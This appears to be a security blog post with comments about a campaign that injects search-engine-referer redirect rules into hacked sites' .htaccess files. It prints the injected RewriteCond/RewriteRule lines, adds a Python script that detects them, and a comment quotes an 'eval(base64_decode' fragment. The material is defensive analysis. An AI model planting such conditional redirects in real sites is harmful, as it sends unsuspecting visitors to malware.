Malware Redirecting To

We are seeing a large number of sites compromised with a conditional redirection to the domain (

On all the sites we analyzed, the .htaccess file was modified so that anyone arriving from Google, Bing, Yahoo, or any other major search engine (detected by checking the referer) would be redirected to that malicious domain (

This is what gets added to the .htaccess file of the hacked sites:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
RewriteRule .* [R,L]

Google is already blacklisting it, and so far it has found that the domain was used to compromise 787 domains (the number is probably bigger, since the domain went live just 3 days ago, on Jan 29):

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 787 domain(s), including,,

What is very interesting is that this malware is hosted at the same IP address as other domains that were used in .htaccess attacks in the past, so we think it is all done by the same group:
.. few more domains ..

We will be monitoring how it is growing and we will post more details soon.

If your site is compromised, check your .htaccess to see if it was modified. If you are not sure, run a scan on your site here:
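
To check a .htaccess file by hand for the pattern shown above, the following Python script (an added example, not Sucuri's scanner or code from the original post) flags any redirecting RewriteRule that is guarded by a search-engine HTTP_REFERER condition. The function names and the placeholder.invalid target are assumptions made for the example; the engine list is copied from the injected RewriteCond.

```python
import re
import sys

# Search-engine names copied from the RewriteCond shown in the post.
ENGINES = ("msn", "live", "altavista", "excite", "ask", "aol",
           "google", "mail", "bing", "yahoo")

def is_redirect(parts):
    """True if a whitespace-split RewriteRule line redirects externally."""
    flags = set()
    if parts[-1].startswith("[") and parts[-1].endswith("]"):
        flags = {f.split("=")[0].strip().upper()
                 for f in parts[-1][1:-1].split(",")}
    target = parts[2] if len(parts) > 2 else ""
    return bool(flags & {"R", "REDIRECT"}) or bool(re.match(r"https?://", target, re.I))

def find_referer_redirects(text):
    """Return (line_no, rule) for every redirecting RewriteRule guarded by
    an HTTP_REFERER condition that names a search engine."""
    hits, guarded = [], False
    for no, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            guarded |= ("http_referer" in parts[1].lower()
                        and any(e in parts[2].lower() for e in ENGINES))
        elif directive == "rewriterule":
            if guarded and is_redirect(parts):
                hits.append((no, raw.strip()))
            guarded = False  # conditions apply only to the next rule
    return hits

# Constructed sample; placeholder.invalid stands in for the elided domain.
SAMPLE = r"""RewriteEngine On
RewriteCond %{HTTP_REFERER} !^https?://(www\.)?example\.org/ [NC]
RewriteRule \.(jpg|png)$ - [F]
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
RewriteRule .* http://placeholder.invalid/ [R,L]
"""

if __name__ == "__main__":
    # Scan the .htaccess paths given as arguments, or the sample if none.
    for path in sys.argv[1:] or ["(sample)"]:
        text = SAMPLE if path == "(sample)" else open(path, errors="replace").read()
        for no, rule in find_referer_redirects(text):
            print(f"{path}:{no}: {rule}")
```

The benign hotlink-protection rule in the sample is not reported, because it neither names a search engine nor redirects. .htaccess files in parent directories also apply, so check every directory from the web root up.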

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • JamesDickinson

    We have an account with 1&1 containing several websites in a root directory. After cleaning the malicious code from all PHP files (‘<?php eval(base64_decode'), the website was being redirected from Google to '; is this because the site still contains redirecting code, or that I need to wait between 5-13hrs as recommended in this post?



  • Steve Z

    I have a friend who runs a blog at the address below and I’m getting this malware warning in Chrome when I try to visit, but when I run it through your site check it comes back clean. 

    Any help or suggestions?
